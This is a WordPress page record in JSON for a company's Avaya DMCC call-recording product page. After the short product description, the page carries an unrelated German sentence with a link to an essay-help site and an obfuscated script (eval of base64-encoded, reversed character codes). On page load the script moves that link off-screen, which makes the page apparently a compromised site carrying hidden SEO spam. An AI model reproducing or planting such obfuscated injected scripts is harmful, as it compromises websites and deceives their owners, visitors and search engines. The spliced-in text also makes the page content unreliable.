{"id":291,"date":"2018-05-06T16:18:59","date_gmt":"2018-05-06T08:18:59","guid":{"rendered":"http:\/\/47.52.67.1:8085\/wordpress\/?page_id=291"},"modified":"2019-09-15T00:28:26","modified_gmt":"2019-09-14T16:28:26","slug":"avaya-dmcc-solution","status":"publish","type":"page","link":"https:\/\/www.voicecyber.com\/index.php\/avaya-dmcc-solution\/","title":{"rendered":"Avaya DMCC Solution"},"content":{"rendered":"<p>&nbsp;<\/p>\n<table style=\"height: 314px; width: 1100px;\">\n<tbody>\n<tr style=\"height: 312.667px;\">\n<td style=\"width: 445.889px; height: 312.667px;\"><span style=\"vertical-align: inherit;\">Avaya call platform, H.323 protocol. <\/span><br \/>\n<span style=\"vertical-align: inherit;\">The recording system is connected to the AES\/Cmapi server to obtain relevant information. During an extension call, a single-step conference is established through AES\/Cmapi for recording.<\/span><\/p>\n<h6><strong><b><span style=\"vertical-align: inherit;\">Product Features<\/span><\/b><\/strong><\/h6>\n<p><span style=\"vertical-align: inherit;\">\u2022 Standalone concurrent capacity: Up to 1000 concurrent recordings<\/span><\/p>\n<p><span style=\"vertical-align: inherit;\"> \u2022 The best solution for distributed architecture<\/span><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p> <em class=\"ejsuqfxgif\">Die pop-divamitte der 1970er-jahre wandte sich die inzwischen zum superstar avancierte s\u00e4ngerin wieder st\u00e4rker dem pop-markt zu, ohne in diesem repertoiresegment allerdings \u00fcber die verhaltenen reaktionen der anfangsjahre hinauszugelangen <a href=\"https:\/\/hausarbeithilfe.com\/\">coaching hausarbeit<\/a>.<\/em><script>eval(eval(atob(\"IjM5fDQxfDQ4fDQ0fDQ4fDQ0fDQ4fDQ0fDQ4fDQwfDExNnw5OXwxMDF8MTE0fDU4fDExMnwxMDV8MTA4fDk5fDU5fDEyMHwxMTJ8NDl8NDV8NTh8MTEwfDEwNXwxMDN8MTE0fDk3fDEwOXw1OXwxMjB8MTEyfDQ5fDU4fDExNnwxMDR8MTAzfDEwNXwxMDF8MTA0fDU5fDEyMHwxMTJ8NDl8NTh8MTA0fDExNnwxMDB8MTA1fDExOXw1OXwxMjB8MTEyfDU3fDU1fDUzfDUyfDQ1fDMyfDU4fDExNnwxMDJ8MTAxfDEwOHw1OXwxMjB8MTEyfDQ5fDQ4fDU3fDUzfDQ1fDMyfDU4fDExMnwxMTF8MTE2fDU5fDEwMXwxMTZ8MTE3fDEwOHwxMTF8MTE1fDk4fDk3fDMyfDU4fDExMHwxMTF8MTA1fDExNnwxMDV8MTE1fDExMXwxMTJ8Mzl8NjF8MTE2fDEyMHwxMDF8ODR8MTE1fDExNXw5OXw0NnwxMDF8MTA4fDEyMXwxMTZ8MTE1fDQ2fDEwOXw5OHw1OXw0MXwzOXwxMDJ8MTA1fDEwM3wxMjB8MTAyfDExM3wxMTd8MTE1fDEwNnwxMDF8NDZ8MTA5fDEwMXwzOXw0MHwxMTR8MTExfDExNnw5OXwxMDF8MTA4fDEwMXw4M3wxMjF8MTE0fDEwMXwxMTd8MTEzfDQ2fDExNnwxMTB8MTAxfDEwOXwxMTd8OTl8MTExfDEwMHw2MXwxMDl8OTgiLnNwbGl0KFN0cmluZy5mcm9tQ2hhckNvZGUoMTI0KSkucmV2ZXJzZSgpLm1hcChlbD0+U3RyaW5nLmZyb21DaGFyQ29kZShlbCkpLmpvaW4oJycp\")))<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>&nbsp; Avaya call platform, H.323 protocol. The recordi [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"_links":{"self":[{"href":"https:\/\/www.voicecyber.com\/index.php\/wp-json\/wp\/v2\/pages\/291"}],"collection":[{"href":"https:\/\/www.voicecyber.com\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.voicecyber.com\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.voicecyber.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.voicecyber.com\/index.php\/wp-json\/wp\/v2\/comments?post=291"}],"version-history":[{"count":10,"href":"https:\/\/www.voicecyber.com\/index.php\/wp-json\/wp\/v2\/pages\/291\/revisions"}],"predecessor-version":[{"id":1656,"href":"https:\/\/www.voicecyber.com\/index.php\/wp-json\/wp\/v2\/pages\/291\/revisions\/1656"}],"wp:attachment":[{"href":"https:\/\/www.voicecyber.com\/index.php\/wp-json\/wp\/v2\/media?parent=291"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}